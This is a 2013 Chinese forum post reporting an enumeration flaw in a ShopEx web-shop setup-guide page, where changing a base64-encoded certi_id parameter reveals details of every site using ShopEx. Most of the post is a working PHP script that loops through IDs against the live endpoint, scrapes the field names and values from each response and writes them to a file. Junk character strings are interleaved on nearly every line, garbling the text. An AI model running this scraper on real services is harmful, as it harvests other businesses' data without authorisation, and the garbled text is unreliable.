|
|
简要描述:
1 `# f: t& a% m- TShopEx某接口缺陷,可遍历所有网站" B$ c: L% x% w# O7 X2 D" b* K
详细说明:
# D {0 v& @6 u% u问题出现在shopex 网店使用向导页面 8 g4 U* y/ T( a2 f: ?) o
|2 r& f: x( ~0 @1 T6 f. o
. a3 x5 B y2 f8 U3 v
# r, t/ B# t5 Jhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=0 \# ^9 R, w6 H. d) _
. n a& x9 M8 s9 c/ g' p. i
' F- t6 z# s! w y X! t6 y d7 a7 {" u n' f
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
! k0 f2 D- X( c! k$ z
' Y. s- H, t$ h# {8 e& k7 b) G. f
2 P- z6 I6 v% P. W# Z8 m5 G4 F
& }% Z% q7 Z/ B0 i( {我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
2 z, O- w: n' U. }: i* W1 _
6 d* t. R6 ]7 D; L5 N
# y7 e2 s) g0 R' D
7 y( \8 A9 T% E; |; d: w<?php6 x& ~; ?% }7 B
0 K% h! C0 ]9 M" M# q0 q for ($i=1; $i < 10000; $i++) { //遍历3 F! e/ V$ v4 D4 B
% p3 z9 L: c/ p( U
ShowshopExD($i);
: o( y% t& o- K8 L ^" x9 M. ? v- k* r' A: F8 E
}
V5 ^6 h% T0 o5 j- g# n3 e
! M0 ^* g) r; x) t7 W+ w! K function ShowshopExD($cid) {
1 A {: y4 x/ m/ ]7 L' F+ S5 ~# H2 A: c% M( V7 _
$url='http://guide.ecos.shopex.cn/step2.php';
0 f0 I+ K: I' @: b: X1 i: C" M
4 @7 o7 y& ]6 d $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
6 i8 _! H4 C u) z6 V
- m) K E% N. d $url = $url.'?refer='.$refer;% U- }, S" G; W/ r' d' \1 |& W
" j2 {1 S& M% t7 J$ T
$ch = curl_init($url);
3 T2 [; S4 n/ \5 {7 U- S7 u( S7 n) \$ t; m
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
5 d f) ?/ R4 e. I, W' Q+ D
. o) e( G6 N; q/ C* P M; K" B curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
1 Q' ^7 V9 p4 q' n' J8 H7 w* n0 ^) u3 C5 N
$result = curl_exec($ch);! o6 z. n2 T; V
0 f3 O' K/ {2 t: n4 ` $result = mb_convert_encoding($result, "gb2312", "UTF-8");
& `7 b( y, ?" l1 A) W* T% w' m2 `2 R0 S8 L
if(strpos($result,$refer))" C9 Y& n% J# ^ \( r
+ A' s8 n& m4 Q: N: U, m
{2 s4 u! N Q1 q/ u
: I* g. x/ t4 z& g- t $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
6 n/ L! q9 T+ b; o H% J7 Y* i7 l: }0 R0 }# \+ u: C* `
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);- I2 s) x4 w* T; @. M
% Q3 r4 I; j& C) c) [ foreach ($value[1] as $key) {7 w S& e7 v! H. o7 x4 l
- I8 r1 s0 E. L/ j3 z$ p+ M
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);5 M) Z3 I$ s+ A
* l2 y$ x6 L. y
echo $res[1][0].':'.$res[3][0]."\r\n";
+ r8 K" `: t, t# X& I, T6 ^1 L" W
' R! f$ x, |7 _, G3 g $col =$res[1][0].':'.$res[3][0]."\r\n"; 5 X' {, ^% z J) y+ g5 J( k
$ }7 z# Z0 P" G; j/ O6 B fwrite($fp, $col, strlen($col)); ! i8 f6 h0 i. c
/ u2 S& }! P$ i2 y4 G }
& ?" Q8 D: O$ q1 p# u" W% S& O5 L" n" T4 h6 k- E
echo '--------------------------------'."\r\n";3 H& V8 V; n; o( R
# M- q7 Y+ E* G- h6 N2 ^
fclose($fp);
3 f4 p4 p( D1 f% l
' P1 g% k& }+ f; X$ x, b% V }0 H3 Z" n4 o: d5 P, V* Q$ j
/ b# w& C7 V+ v. p- [, R; U
flush();
# S5 ]0 F$ G; m0 \: ]2 `; f' m9 |. z. J$ M4 X3 [
curl_close($ch);
+ I8 e* J7 o$ D4 E6 H
/ M& U% Y( C9 z1 K6 d0 @9 ` }+ u9 v, X0 `+ E) K+ f# B
( t7 }2 l/ @; g" i
?>, F" P# n$ O/ d+ S: r' I9 ^& d0 H
漏洞证明:
- p- r- M1 t) Mhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
* h8 z5 x. y7 M9 Zrefer换成其他加密方式 T8 R& h I8 Y2 k0 F9 S: ^
|
|
发表于 2013-9-21 15:59:47
收藏
分享
支持
反对